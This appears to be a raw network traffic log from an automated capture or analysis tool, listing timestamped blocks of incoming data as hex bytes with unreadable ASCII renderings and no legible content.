                                                                              2023-10-26 07:45:59 UTC8407INData Raw: e3 5e 81 05 6b ff 77 49 f9 40 75 c5 41 55 95 ec 11 9f d1 ef a5 71 12 c4 ab 12 bf b3 34 5f c0 28 62 34 75 52 77 9a 68 5c 9a 92 5d bf e2 06 c3 41 c1 e5 bf 4f 60 ed 8c 51 96 74 3b 44 89 ef 85 82 c5 b3 97 5d 5c f6 8d 42 f4 fc 82 0f 26 b1 db 3e 23 1e 2d f2 7f 57 9a 03 2d 0a 0e 09 18 fa 9a 26 02 34 51 54 57 16 02 97 4d 20 91 51 00 52 68 ec fe fc 75 5a bd a2 3a 81 69 43 7f 00 e8 f4 c4 e1 22 20 44 31 4a e2 e2 12 96 aa 12 cb a9 ac 76 0e ff a9 5d 89 2a d1 2a 82 68 d3 f6 75 d5 7a e9 2f ec 03 e0 f1 0a 56 1e 7f ff cd c1 ed 05 81 e5 70 df f3 4f 7c 0c a1 8a 5d 40 82 be a7 8d 5a c0 af 10 db bf 2f e3 c5 39 2d c0 77 19 bf 25 af 53 58 a0 95 46 ae 88 e3 f2 03 04 74 40 c8 44 29 ab 1e 87 d4 c3 f4 7d 4b 19 ab 9a ee d3 ef 2f e4 48 a8 b5 bc ed 02 68 c8 54 79 7a 55 10 a7 02 72 3c
                                                                              Data Ascii: ^kwI@uAUq4_(b4uRwh\]AO`Qt;D]\B&>#-W-&4QTWM QRhuZ:iC" D1Jv]**huz/VpO|]@Z/9-w%SXFt@D)}K/HhTyzUr<
                                                                              2023-10-26 07:45:59 UTC8423INData Raw: 87 4b e7 9e eb 1a 39 dd b6 23 99 e5 42 bc 3e c2 5f 75 c5 6b 6b 29 a0 d7 17 6e 2d d9 f2 27 c7 2c 2f df 3c 24 0a 44 a9 fe 2b 58 69 d5 b2 11 ff 3a b9 5f 64 cb 9d ff 9e eb 4f 53 ca 48 4e b8 d8 69 f6 f5 51 01 e9 7d e7 6a 90 33 4f d3 37 c8 ca 31 51 3a 34 21 bb e6 82 7c 95 55 96 3c e9 0a 43 a0 02 68 bf e7 7b 79 d5 f9 bd 2f 52 c9 09 40 70 eb 3f 7f e5 aa 94 e8 10 4e b8 79 a1 71 21 01 6c f4 40 db c2 8e aa e9 50 b8 b3 71 90 00 09 a0 49 e0 fa ff b5 94 24 9c c0 c2 02 42 f0 20 d2 60 2a ae a9 5c cf 7f 07 34 ed b9 f5 03 ec f4 95 81 8d 67 bc 34 3c 27 f4 78 58 54 80 27 8a 80 ad da 1f 63 b4 b5 86 41 14 14 07 1c 43 3c a6 d3 a7 c6 32 8c 2e d2 c1 00 19 27 97 55 cb ea 3d 06 0b 72 8f 28 6f 59 d1 af a7 9d e8 00 3a cf 5e 70 b7 54 6b cc 20 ab 04 73 48 6b c0 0b c2 1e ac 63 31 3c 13
                                                                              Data Ascii: K9#B>_ukk)n-',/<$D+Xi:_dOSHNiQ}j3O71Q:4!|U<Ch{y/R@p?Nyq!l@PqI$B `*\4g4<'xXT'cAC<2.'U=r(oY:^pTk sHkc1<
                                                                              2023-10-26 07:45:59 UTC8439INData Raw: 31 20 78 cd 90 55 02 dd 65 98 5f c8 34 7b 15 83 27 3a 7e 6a ab 11 00 1c 90 02 d5 ff a7 36 30 4c de d5 13 4a 4d 04 a3 fb e2 c0 79 0e 3d a7 01 ba ae 16 12 82 1e b8 82 76 21 f3 cf c8 df 29 eb 09 d3 72 79 90 f5 01 70 a3 de ff ae 8d d1 ff 05 28 8c 13 b7 6c c9 df 80 2c 3a 4c b4 e9 5e a4 18 b1 3c 02 1d 59 50 9f 51 54 8c 8f fb c8 f0 5f 63 a9 d7 03 27 16 dd 4e f5 84 a4 97 a8 00 da 42 79 30 20 ed 81 03 bc cc 00 55 48 5a 5f 61 a2 94 23 83 2e 77 10 33 76 bc c2 69 fe c9 16 a3 9a 62 6d 60 2c bc 71 e0 f3 0d cb 38 80 20 3f 3a e8 c7 f5 c1 64 15 50 76 c8 2d c5 0d 55 0b cd 2c c0 14 d2 05 a7 79 89 e9 0d a2 a4 01 6d e8 c9 4a f7 0a f5 f3 81 1b 68 0c 8b ed 3b 33 93 4f 10 a7 16 70 b6 3c 58 8f 45 4b e8 e8 6e 80 68 3d 5f fd 7d 9d d9 1f 82 1b 05 fe 6d 11 5d 2e eb 61 95 81 ea 40 13
                                                                              Data Ascii: 1 xUe_4{':~j60LJMy=v!)ryp(l,:L^<YPQT_c'NBy0 UHZ_a#.w3vibm`,q8 ?:dPv-U,ymJh;3Op<XEKnh=_}m].a@
                                                                              2023-10-26 07:45:59 UTC8455INData Raw: af f2 d3 e5 b0 3d 3b bd ef cb a7 5d ce a9 bd 67 7f 27 5d 9c fd 05 02 b4 77 07 21 ba 2a 68 2f 13 89 44 ff b4 5b bc 44 24 b4 3f ce ae ce f9 96 bf 62 ff 38 71 19 c5 33 fe 39 3f 20 97 3a a5 1a 2f d3 e3 43 ce fc 9a 35 54 7e 78 31 39 b5 d1 18 48 74 27 f5 1c cf b6 34 8b b4 9d 5d 33 1e 44 ee 11 f6 25 ac 52 f7 b1 e6 e1 2e e9 a8 ed 2f f8 c7 b1 89 c3 3f f8 60 c2 41 c7 03 ae 33 eb c5 f6 db d6 95 de 18 d6 70 0b e1 0b 20 5a 47 55 7b 4a 48 89 6a 2f ad 81 f4 e8 d4 f5 bf a3 d7 c3 41 03 10 04 44 8b f4 7e 56 eb f3 7d a2 49 f5 f9 1c 2d be 31 45 01 20 15 2f 95 5b 2b 65 e0 b5 f7 60 c8 27 9a 7e b0 9f b7 dc 60 4d 08 e3 5a 05 d0 2d 3d 14 f1 13 ff 79 08 ef 88 5a bc a8 16 0b 91 b8 ce 2d 15 23 a0 c5 aa c4 be b7 5c f4 c8 01 ec f2 2a 8a c3 fe e0 1f de 1a dc f8 6c 49 f7 e8 13 90 62 10
                                                                              Data Ascii: =;]g']w!*h/D[D$?b8q39? :/C5T~x19Ht'4]3D%R./?`A3p ZGU{JHj/AD~V}I-1E /[+e`'~`MZ-=yZ-#\*lIb
                                                                              2023-10-26 07:45:59 UTC8471INData Raw: 58 05 a0 2b e9 c2 b6 43 8f 75 f0 0c 31 8d 51 ab c2 c8 7f db 7b b7 d9 6f cb 76 e4 a0 13 a0 9f 2e 67 0e ea 63 44 01 9e 7b 51 09 6b c2 1f 89 2e a5 94 37 a8 93 4a be 8f ac 72 f5 e2 1a 56 b2 a0 18 c0 28 c9 53 ff 2c ce e7 3f fd b5 a4 ac d0 f4 20 26 db 31 e6 63 54 a2 a3 2e 48 e9 ba 1f cd 1c 05 69 21 24 ae d0 38 fd a9 57 9d 57 9a be 44 c6 c0 5e 51 73 64 69 10 c1 22 62 4a fe 98 70 73 e3 3a d6 de 7c 30 7d ac 3b 8b 68 1a 27 b9 ae e0 79 30 a4 13 11 d2 bc d9 ae 00 35 55 38 05 1f 21 fd ff 31 d5 26 2b 2d 0b 1e 2a a7 8c c7 01 31 94 5c 5e 79 85 f6 71 e4 83 72 40 2c 4c 13 cf 16 bc 01 2c e3 7b a6 1d 43 12 77 f0 85 8a 99 5c 1b 87 3c 4a 4a 47 1f b0 48 80 65 29 52 c9 16 7a 3e 33 02 ef 94 f6 4c 5e 99 fe 09 26 34 1d 90 79 bf 56 f0 30 30 5b 51 d6 9c 68 3d 2c 82 7b 1e a8 70 9c 9b
                                                                              Data Ascii: X+Cu1Q{ov.gcD{Qk.7JrV(S,? &1cT.Hi!$8WWD^Qsdi"bJps:|0};h'y05U8!1&+-*1\^yqr@,L,{Cw\<JJGHe)Rz>3L^&4yV00[Qh=,{p
                                                                              2023-10-26 07:45:59 UTC8487INData Raw: 42 b4 d6 60 5e 31 fb b5 74 97 e8 e4 03 0b 84 ed 1d 03 0e c3 b7 bc b1 3e 06 1d b2 12 bb 2f 0f 28 6b d9 af c2 0f 39 f1 d7 55 e6 09 55 c3 0a a1 0e 18 3f 53 26 42 34 7e a1 42 50 2b b5 2c 3a 01 b6 0c f5 ff 6f 09 ec 8f 44 8a 55 60 20 fc bf 02 37 35 57 b0 14 a7 d5 70 ac 0a 8d 2a 7e 7d a9 14 f1 07 25 58 59 fc 01 68 07 dd fb 3e 49 c5 63 08 77 48 29 ff f5 aa b2 2e d3 34 67 b2 2f d7 f2 87 b4 91 a9 57 68 8a bc ff 78 e9 60 9a a2 f7 06 18 45 89 f8 19 ff c0 97 e8 2d 42 d0 4a 08 bc 92 4f bc a4 7d 96 b3 83 d4 63 d7 5a d5 10 bb 07 4b a7 b4 5f e4 4a 3c 92 75 d2 8f fb 03 05 46 e2 7f ef a3 f7 d1 30 7a c1 98 e1 54 10 37 4e 3f 0e a3 c9 74 bb 6b 3d a6 c8 4d e4 8e ff 82 c1 e3 04 c0 24 5f f7 3c b3 4e 9d e5 06 98 dd 04 81 cd 0c a7 9a fd 7d 0c e8 2c 1e ee 1f 1c f5 00 0b 05 b0 01 eb
                                                                              Data Ascii: B`^1t>/(k9UU?S&B4~BP+,:oDU` 75Wp*~}%XYh>IcwH).4g/Whx`E-BJO}cZK_J<uF0zT7N?tk=M$_<N},
                                                                              2023-10-26 07:45:59 UTC8503INData Raw: 06 80 f1 d0 13 97 26 de b1 0c 55 62 ed a5 46 74 7d 4b 9c ed aa 81 4c 35 ff 67 08 68 09 26 d5 d6 7c c7 38 ca c3 40 27 77 db 4d b7 d2 5c 16 c1 e7 05 bf 89 6c 3b 0c ec 7e 0f 58 02 ec 91 5d 44 31 f8 df b0 52 8f 85 72 11 54 2f a4 b5 a2 07 19 b4 8b 6c 89 98 c0 20 8d f2 2e 95 f1 b6 2d ef 5c 90 33 74 68 31 08 08 27 d0 6a 80 27 e9 18 dd 69 4b ef 76 f4 62 96 da 18 04 16 62 25 de 20 c3 84 2d 46 ce 18 16 17 ac 2c f5 60 7f d4 01 bf 04 f2 cd 1d 1e fd e0 9c d2 16 47 bd 2a 80 39 3d 67 13 48 d4 a5 16 e7 dc 5b ba 5c 85 04 9b 93 4b ab 3b b2 09 ea 48 f4 5f fb 83 58 df 6b fb 11 9a 3a 30 07 62 61 e8 9c 4f 64 6c fc 29 50 00 08 d3 d6 dc d1 b3 7d a7 c1 d8 78 e0 27 84 2b a3 4b 00 12 f7 6a 24 87 66 ab 4c a6 15 0e ed 59 b4 63 cb 04 bc 26 98 82 67 97 e0 05 3c 1b b1 a5 9b 81 30 cc c1
                                                                              Data Ascii: &UbFt}KL5gh&|8@'wM\l;~X]D1RrT/l .-\3th1'j'iKvbb% -F,`G*9=gH[\K;H_Xk:0baOdl)P}x'+Kj$fLYc&g<0
                                                                              2023-10-26 07:45:59 UTC8519INData Raw: b7 f0 02 68 ed 67 fd 79 fe 27 61 03 32 96 a5 da 7d 80 2e 68 af be 1d 5e 4f eb 27 9f f1 a3 df 2a 6f a9 76 d3 bb b2 e4 a4 0d 1f e9 13 c0 8b b0 bd 29 21 1a 51 f5 94 ef 73 2c 09 0f e7 cf 5f 94 b4 80 81 f0 75 01 ee 6f c1 ed 04 ff c5 6b a5 43 e9 ce c5 66 54 87 ab b2 e0 10 85 a5 0f 82 c5 3a c0 56 77 ca 24 20 5e ac ba 40 87 51 52 ba f2 4d 2d 5f 31 5c c6 87 7c 65 ff 6b f7 ec 07 81 0c 5a c6 57 f2 80 03 a4 20 9f 5d b9 78 cb 61 bc 82 21 f1 80 e8 81 e9 22 e0 3b 99 3c 04 c9 be 16 fd af 01 8b ba cb bf 73 82 24 86 14 5e c2 75 70 a1 5a b0 bb 7c 6d 0a 14 4f 3e 7c e7 0e 0f f6 cb c8 4c a8 16 82 10 84 12 da ee a3 ba 8c 57 0b 68 c5 78 df 27 ee f6 ea 52 11 01 bb 7b 0c e3 2f 01 7b e8 b2 e2 2d 80 12 68 b3 99 fe 51 12 5b e4 82 e0 25 cf 4e 7f a0 02 39 6c df 49 95 55 14 de c5 53 81
                                                                              Data Ascii: hgy'a2}.h^O'*ov)!Qs,_uokCfT:Vw$ ^@QRM-_1\|ekZW ]xa!";<s$^upZ|mO>|LWhx'R{/{-hQ[%N9lIUS
                                                                              2023-10-26 07:45:59 UTC8535INData Raw: e4 ef 2f 15 ae df 32 f4 57 fc 21 cb e2 93 2c 06 28 5d 97 ec 7a 43 4b 21 19 8e 63 97 18 5d c5 ce 01 3e 82 ed 8f fe 55 b5 d4 0f 84 f4 0a 07 d6 ff e9 35 aa fe be c3 85 fb 17 e6 09 16 38 21 d0 fe d4 4e 52 a8 43 80 1b 70 aa 7f 21 17 7d 95 06 b9 5a 76 31 cd c4 85 e0 68 dd 90 2e cc 67 ca 3c fa f5 17 75 06 20 65 90 c0 d2 3e 93 f9 02 de 8d 58 49 74 5f a1 77 5f ed 32 6f 00 e7 ff 98 06 9b 23 76 cd a0 11 09 0c 42 05 03 52 f6 62 58 f2 05 77 9e 43 8b b4 00 fd c8 fc 2e ed e4 fc 64 ea bc bf 12 ee d2 c7 00 7a c0 21 98 b2 e6 ee 9b 9f 21 c2 43 4e 82 b0 db 28 4d e7 ba 02 76 92 c2 58 e8 f7 56 ae 1f d8 57 90 c8 10 c3 9d 61 73 0c c0 c0 64 2f ca 6c df 94 55 bf 7e c9 71 60 c2 14 04 ec ca d1 a8 cc 32 c4 1e f1 1f 78 3a 6f 2d ac f8 44 24 2e 97 f6 22 7b a4 7f b4 40 b7 65 4a 25 74 4a
                                                                              Data Ascii: /2W!,(]zCK!c]>U58!NRCp!}Zv1h.g<u e>XIt_w_2o#vBRbXwC.dz!!CN(MvXVWasd/lU~q`2x:o-D$."{@eJ%tJ
                                                                              2023-10-26 07:45:59 UTC8551INData Raw: 2a 43 7a 0b 4c 45 3f 03 88 98 9f 74 38 0e ff 94 4b dc 85 0d 0c bd d4 06 38 60 d0 2f a8 25 b5 d1 f5 82 c3 cd 83 e0 2e 99 44 9e 56 27 77 98 dc a6 94 02 e4 03 53 1a 91 6e 09 da c8 4b b6 80 93 b7 fd 90 48 03 e8 40 d8 42 b7 02 64 e8 24 80 9e a5 6d 5d f6 03 38 33 a2 09 fb 6e 05 ac dd 1c 42 08 4d ac 15 94 30 f4 60 e9 8b 58 27 37 81 d6 96 e3 e9 2e 27 4f 20 ca 40 c0 64 61 71 dc d7 6e 57 db 50 20 2d a2 5e f0 aa 01 00 3d b0 02 0b 2e d3 28 a5 9f 46 f7 1c 28 d0 06 88 cb 74 aa a1 4d 5b 3f cc 30 02 24 c0 1c 74 4a 88 45 dd 50 10 b6 1c 4b 03 f3 04 3d e9 62 38 7f 34 55 21 9f 75 a0 a3 f2 5e 29 b0 2c 7a cc e6 02 e9 8f 95 a7 53 e3 e8 e8 97 50 dd 9c 44 f7 b9 d4 af 9c 6c c3 14 07 79 a5 80 18 ba 04 18 f8 d5 05 8b a8 8c a0 f9 80 08 73 5d 8d c2 30 c1 1f 5c 41 43 4e 28 82 c2 de 2a
                                                                              Data Ascii: *CzLE?t8K8`/%.DV'wSnKH@Bd$m]83nBM0`X'7.'O @daqnWP -^=.(F(tM[?0$tJEPK=b84U!u^),zSPDlys]0\ACN(*
                                                                              2023-10-26 07:45:59 UTC8567INData Raw: f4 3f e8 00 ab b6 fe df e6 ca 9b d1 f2 40 a1 e3 2c e4 37 bd 75 e4 00 6d f4 be b2 53 1a 7c ff 1f bb 1d 5f c0 73 f2 6a 67 59 4e 00 ae 9c 77 7f fd e3 28 2e 01 11 8a 94 8c 69 68 80 60 5d 16 00 2a b2 ed da 4b d2 b3 cc 00 7d 7a c8 84 d9 f5 37 c2 00 0e 78 5a 26 8a db 01 6f 00 31 4b 39 04 3c 4a 15 b2 1f 9e ab da 81 be 9b 92 d2 de d1 83 70 a9 60 01 67 89 8c 80 47 26 6c c4 84 c4 00 a4 37 3f 40 a8 f5 de e0 01 bf 75 4b 89 0b b6 4e 20 1a e6 00 2e 86 cc 7e ea 12 23 35 73 c1 1d ee 63 0c 80 a9 f8 73 30 55 ce 12 de 42 b9 00 29 37 17 fb d4 09 00 e9 10 34 28 a0 5e df fa 38 c0 3b 02 5c c7 73 e0 94 60 9c 98 bb 00 b2 bf 4c b9 62 b3 21 a4 07 0c c0 50 bc 3a a0 39 6f 2d 5b 04 c3 ba c7 98 82 ca 10 03 7d 55 b7 64 1f 80 8f fb 60 1d 8e fa e8 4f 4f 9f f7 dc 98 06 01 0d 59 5c 93 9b 2c
                                                                              Data Ascii: ?@,7umS|_sjgYNw(.ih`]*K}z7xZ&o1K9<Jp`gG&l7?@uKN .~#5scs0UB)74(^8;\s`Lb!P:9o-[}Ud`OOY\,
                                                                              2023-10-26 07:45:59 UTC8583INData Raw: 09 31 d9 bc 7a 09 4a 80 24 ce 2a 1e 99 39 b9 cf 00 65 64 ab 9c a5 88 57 00 e6 b8 8f 12 96 21 c0 72 00 28 2a 94 d7 87 91 6b 10 00 20 51 19 e3 98 c4 44 c6 26 eb 74 52 00 e6 15 5a d7 3c a1 02 5c 93 94 e8 a2 16 40 ad 3f 38 01 2a 84 b7 57 4e bd 73 fc f8 7c f6 7e 01 eb c2 c7 90 f3 47 d5 c4 b6 e7 13 62 f0 a1 00 5f 5c d3 2d 42 36 00 ab 26 c2 97 69 71 41 a6 1e b6 c3 22 87 5a ee b0 7f 76 29 30 dc c0 02 07 bd 8a 43 69 05 70 3b ed 7d 0d 7f a8 98 a0 00 e4 65 7e 88 5b 17 98 db 70 d2 00 06 68 47 ae 5c 26 a1 5a 00 8e 0c 69 57 fb ea 9a cb 77 74 00 35 84 cd 4a 5f be c8 11 00 a2 f0 3f ce 34 c6 2a 4f 1f 5a 58 e7 5f c4 80 27 0e 25 88 fc 78 00 83 cb 46 ec 37 ef 6f d0 00 5b 9b 1c 06 53 96 d7 d8 f4 31 00 5e 05 9d 45 79 ac b6 e8 00 35 27 2a 70 93 a3 af 13 01 77 d1 3a f2 bb ee e3
                                                                              Data Ascii: 1zJ$*9edW!r(*k QD&tRZ<\@?8*WNs|~Gb_\-B6&iqA"Zv)0Cip;}e~[phG\&ZiWwt5J_?4*OZX_'%xF7o[S1^Ey5'*pw:
                                                                              2023-10-26 07:45:59 UTC8599INData Raw: 67 95 57 00 74 29 d7 7d 6f 16 36 7a ee 9c 00 04 12 e0 17 d6 9d b8 db 3f c4 20 80 a7 f3 74 81 fd ca ce 00 b7 83 d6 01 ad 57 9f ee 00 11 30 1a d8 ed 4f 36 76 38 40 f0 7f 07 a2 d5 44 cc d4 a0 f7 63 21 f1 14 7e ff ac 98 a7 00 43 1e 77 d4 00 ba 08 5d 12 a8 96 5b f2 14 90 87 de 80 a0 40 e6 b8 01 4a aa 7b 9c 32 c5 b9 fc f7 ca 2c 11 80 80 00 1b 75 97 6c 07 4a 00 c3 4e aa 6e 65 b7 3f 12 00 e9 30 7c 75 39 ea 37 46 26 51 d9 48 00 d4 b8 80 6c 60 3c 0e a1 73 5e 4e 00 1e 7a f8 2f 3d 05 e2 66 91 b7 51 2a b8 00 cd f6 06 d3 b0 fc fb 42 b5 82 81 4d f7 c0 93 55 44 38 d6 35 01 b9 8c cc 45 3c 1c 4a b8 00 d3 30 c9 58 35 67 7e 00 ee c5 89 d1 ed 1b 72 71 52 39 c0 80 67 09 91 81 87 00 d9 a2 ce 59 a1 b3 30 38 05 5c 7e b1 7c 6d 00 e1 1f 08 03 72 2b 0b 4b bb 7a 68 00 eb b1 ac 9a a2
                                                                              Data Ascii: gWt)}o6z? tW0O6v8@Dc!~Cw][@J{2,ulJNne?0|u97F&QHl`<s^Nz/=fQ*BMUD85E<J0X5g~rqR9gY08\~|mr+Kzh
                                                                              2023-10-26 07:45:59 UTC8615INData Raw: 03 a9 20 a4 f0 05 1e 13 00 ed 44 6d bb 96 4e d1 3c 1f e6 4d 6f 00 5e 49 0e f6 73 f0 00 98 a3 de 57 15 ef f5 e5 00 1b 8e 23 13 6f 99 77 c0 1d 8c e0 6c 8e 83 ea 41 34 cf 0c 42 dc 1e 78 01 24 64 19 46 2f 3a 06 ec ef f1 00 01 40 ba 65 18 21 f7 07 00 f8 df 4e 78 62 f6 03 e0 00 d5 6e c8 48 46 58 7d a1 00 6a 8d aa 0d 15 c7 cc 5c 01 55 53 b3 c6 17 63 47 dc b0 ed 3b 33 02 00 84 76 59 7d e5 f0 2a 1c 77 4a d7 c0 67 0c 62 8d c7 b3 00 5f c3 79 1f 25 2f 3b c1 03 8f 76 50 e8 66 ef 9f a0 fc b0 c5 1d 00 f8 ba d9 70 ea b5 74 d5 03 3e 13 da 64 9d 20 00 ba 6f 9b f0 71 63 a8 9a 00 17 05 5c 81 8f 02 bd bf 71 1e 00 d5 95 ad 4f fd b9 2d 14 01 21 cd 84 ba 17 f4 6f 70 c9 1e 00 9d 18 04 db 4e f8 d0 1d 00 90 e1 d3 21 c3 12 be a8 00 4d 3c a3 80 aa 8a 3a 01 00 37 b1 42 0f 63 20 6b 39
                                                                              Data Ascii: DmN<Mo^IsW#owlA4Bx$dF/:@e!NxbnHFX}j\UScG;3vY}*wJgb_y%/;vPfpt>d oqc\qO-!opN!M<:7Bc k9
                                                                              2023-10-26 07:45:59 UTC8631INData Raw: 75 29 bf 9e ab e6 cb 01 e3 11 b0 db 6c 8d f8 b9 18 f6 00 73 e9 0a 99 3d 58 06 42 00 be e8 77 12 98 d9 ac cd 00 4a 76 94 05 73 8a 23 39 00 ed 74 51 90 be dd 7b 40 00 1d 8b 1a 35 e2 60 ad 0b 00 61 f6 ec d6 98 df 0f e7 03 dd 9b 0a b4 e4 5a 3b 5c b9 80 69 0b 9f 32 15 0f 4b 00 48 ed 54 66 a2 02 80 43 00 ec f5 24 e5 69 7b 99 77 75 4c 00 94 fb 9f 97 7d 55 a6 d9 00 66 fd 95 06 e2 d3 7e 56 16 b4 89 44 dc 40 ad 00 36 13 c2 3d e6 45 88 b3 00 9c b6 80 77 ba fc d5 27 00 26 f5 2b 10 f4 fa 93 c0 00 b3 cd c6 b4 94 ed a1 86 01 3d 05 8b 13 e6 9b a4 f4 c0 ec e8 9d 00 f0 91 e5 e8 2e e2 85 0e 01 01 a9 ed ce 3a 33 a0 d4 be e1 00 0b 92 61 2a 71 70 63 18 00 fe 2f 35 6d 7e 10 5d 73 01 66 1f c3 06 08 85 fa c4 14 12 00 30 43 a2 9e 31 e8 8f e5 77 1f 7f ca 17 04 06 7c af 70 70 49 3e
                                                                              Data Ascii: u)ls=XBwJvs#9tQ{@5`aZ;\i2KHTfC$i{wuL}Uf~VD@6=Ew'&+=.:3a*qpc/5m~]sf0C1w|ppI>
                                                                              2023-10-26 07:45:59 UTC8647INData Raw: 00 58 1d 20 b9 72 ff e0 c7 03 51 d4 02 f4 b7 f1 90 cf 91 5c 00 25 bd 9f 0c fb cc 65 2b 03 47 73 1b ab 7d 09 a0 fe 84 e3 01 81 f9 2f bb 69 c8 43 fc e7 58 00 59 05 b8 bf 8a 8d 93 e5 03 a2 34 f4 96 83 e8 80 c7 f2 b1 00 de c4 b0 a4 ae fa 75 e0 00 46 6d cb 5f 92 93 9f 60 00 c8 b6 39 6f d0 b4 5b ee 2d 28 62 f5 b0 e8 87 99 00 bc 54 10 b0 21 38 71 fd 00 03 f9 b9 22 cf ce 12 5a 7c 99 0e 5f b1 0d 8d e5 f7 fd 00 8e c3 c0 1c 6a 9f 07 52 76 5d 3c ea 39 d6 c8 e9 ee a0 00 f0 69 0e e9 c4 6e 98 47 30 e2 f5 7e 66 c6 52 3c 21 c8 80 1e 53 b5 d2 d4 19 5b 01 4a 59 dd f4 43 77 65 c7 c0 3a 3d af 00 5e 1c bd a9 aa e3 d0 1b 38 ef c6 75 3f 0c 34 1d 78 43 00 71 8e 27 2b 3b 1d 12 50 4c 4e fa 3f 58 00 f8 94 72 2c 70 d8 9e 00 10 86 4f a5 4a d5 a4 25 00 4c d2 8f 30 c9 e1 2e 9b 00 12 9d
                                                                              Data Ascii: X rQ\%e+Gs}/iCXY4uFm_`9o[-(bT!8q"Z|_jRv]<9inG0~fR<!S[JYCwe:=^8u?4xCq'+;PLN?Xr,pOJ%L0.
                                                                              2023-10-26 07:45:59 UTC8663INData Raw: 00 24 c7 bc cc 70 75 17 3a e6 01 03 0d 22 cb 2a 1a 97 90 b0 fa f6 28 82 2f c6 00 9f 4f 8c e9 5f 23 e2 a9 00 3e ce c1 d6 04 f5 19 f0 00 d3 af 2c b1 b3 9d de 2e 39 df 05 f5 00 1e d0 b2 f5 c3 92 3b 3c 07 b3 1d 7e ae 2a e0 9c 52 58 b5 00 dc 8a 5c 83 d4 5f db d8 00 6d 3e 59 ef 4d d2 32 ff 00 e5 1e 5c 7f a0 c6 a9 0a 75 e2 00 8b f4 04 54 ab 06 6b 45 00 a7 0e 32 be 56 2f 65 15 03 7a b7 d9 53 ea bf c8 68 ff 2e 00 8a e8 63 84 8f 75 92 28 00 94 02 da 99 4c 81 1d 6f 2c 5f 14 10 52 95 08 00 32 04 86 9b 9f a6 48 2b f7 00 f9 fb 40 99 7d 53 a0 91 08 43 9e 98 85 80 a8 2b 36 e4 91 08 40 c1 bf 97 53 1e c6 74 7d 61 40 6b f7 fc 4c 00 f3 05 a6 66 2b 5f 13 0b 08 27 74 38 1b 50 34 96 00 63 26 87 7c 62 d7 ed 61 3e 88 54 80 bf 1b 15 b9 79 6a 9c 00 96 b7 12 89 dd cd fe d8 00 02 66
                                                                              Data Ascii: $pu:"*(/O_#>,.9;<~*RX\_m>YM2\uTkE2V/ezSh.cu(Lo,_R2H+@}SC+6@St}a@kLf+_'t8P4c&|ba>Tyjf
                                                                              2023-10-26 07:45:59 UTC8679INData Raw: 7c 31 68 64 47 92 e4 28 3c b0 5c 00 6b ac 66 76 e8 cb 32 01 07 96 6a 67 4a de 9a f8 79 83 01 3a 17 65 69 b6 b0 f9 e0 80 d9 1c 31 04 ec 83 f3 e4 68 5e b8 ad e6 1e 00 2f 4c 73 18 10 09 9a 51 05 2b c2 99 a4 59 80 ec 86 13 54 01 c1 f7 a0 24 be 32 1a c0 73 1c 00 bb ce 26 7d 47 06 63 e1 00 44 98 66 3f 9e f3 db 1b ea b6 c0 80 4e 30 25 7b 31 00 d3 e8 97 eb a2 0f 56 57 fc f4 1d 77 78 20 c0 da 21 ec 05 d3 79 09 e5 c9 0b aa 00 0e f7 88 7a 14 fc 61 e0 fa 00 29 99 59 ab 36 39 9c 10 07 fd e4 d3 08 a9 90 3e 1c 6a a2 09 2b f5 4e e8 14 30 00 d1 ce 14 28 30 a8 9c c9 00 3d 99 b3 8d 2d 37 7d 94 00 62 c5 cf 9a c4 9f e1 39 a0 99 b8 7a 00 02 93 f8 0b f6 a4 75 a9 70 bc 00 b3 15 f1 ce 8b 92 07 b6 03 76 0e 52 6a 7c 91 d0 ba 61 d3 3c e5 e9 00 1f 51 9b 63 b3 2b 5a 07 ab 5e 83 1d bf
                                                                              Data Ascii: |1hdG(<\kfv2jgJy:ei1h^/LsQ+YT$2s&}GcDf?N0%{1VWwx !yza)Y69>j+N0(0=-7}b9zupvRj|a<Qc+Z^
                                                                              2023-10-26 07:45:59 UTC8695INData Raw: f0 21 00 58 0d 1b 48 b9 f1 97 f6 7b a9 00 66 85 29 2d e3 c9 cc b2 00 e8 15 4f 54 46 92 de 44 77 58 00 4d d4 4c 87 2e c3 1a 94 00 42 93 35 15 96 64 63 1b 00 aa 58 80 bd d0 0e 8b 6e 00 7f 72 39 ef 33 4e 1c e3 00 e0 22 9b 6d 96 a9 5f bd 00 9f b3 44 9a 85 89 88 54 00 4f c1 2e b1 ee 75 bc 29 00 1b 74 3f d9 5b ad bf ba 00 f3 2f 58 47 15 69 9d 8a 09 1b 7f 13 77 80 34 d6 4f 55 26 00 f3 78 d8 18 7c 95 ad 99 03 8f c2 b4 bf 30 77 a8 6f a4 f7 00 93 a8 e9 6c 9d ef c8 14 00 dd 04 9f 1c db 0a 09 f2 00 9b 0b cb a8 59 ca 7d e2 01 2e 3b 34 e0 30 97 a3 e4 f4 f5 3d a4 11 03 1e 28 d0 f1 2f e8 af ab ca 00 77 d4 b5 91 23 78 02 70 00 45 67 ec b1 50 19 cb af e0 61 00 0f ae 81 10 c0 e8 9d 5b 00 a5 a2 f3 15 ce 84 24 16 00 36 09 a4 fb c9 b2 93 d3 00 10 cf 1d fd f1 bb 2d dd 00 72 e1
                                                                              Data Ascii: !XH{f)-OTFDwXML.B5dcXnr93N"m_DTO.u)t?[/XGiw4OU&x|0wolY}.;40=(/w#xpEgPa[$6-r
                                                                              2023-10-26 07:45:59 UTC8711INData Raw: bc 00 e7 72 8e 5d 20 b0 99 45 00 3b 4e 6d a8 d1 bb 3a 2a 00 1d d5 41 25 0f fd 0a b1 5c 68 d0 00 cf e4 bb 33 1e b4 2e 38 db 1a 84 6c 53 0e d0 8b 68 00 e4 ed 22 84 c8 7c 1f 00 97 a7 ce a0 8e 8d 53 60 3b 4e f8 80 e8 72 a1 8c 63 03 30 31 13 71 56 3b 52 58 28 4d 79 d9 07 92 29 03 b4 c8 d0 7c d2 6b c7 01 c3 4a c2 9c b5 49 f7 cc 22 04 01 eb 50 fa 60 a6 db e0 c5 0b 0a 00 29 61 d2 87 c6 c4 3e fb 3e ad 90 fb fe 00 b0 38 07 66 16 e9 5d fe 1e 7f 80 00 11 dd b1 b8 73 b4 0d 9b 0e 8b 8c 24 18 a0 c4 98 7b 9f ee 00 67 15 10 40 91 eb 75 5f 1c 39 6a a2 c0 25 22 50 5e b2 77 00 a0 15 d6 46 07 cf 74 d8 00 a6 4a 96 cd 7f c9 df 7e 02 3f bf 1c d0 c8 43 80 e6 17 46 b3 61 00 53 22 a1 cf 70 15 c3 06 00 d8 e1 f0 c0 d1 d0 19 c8 01 a7 aa 6a 11 8d 1c a8 81 c8 56 9b 67 2e 4b c4 e2 1d 00
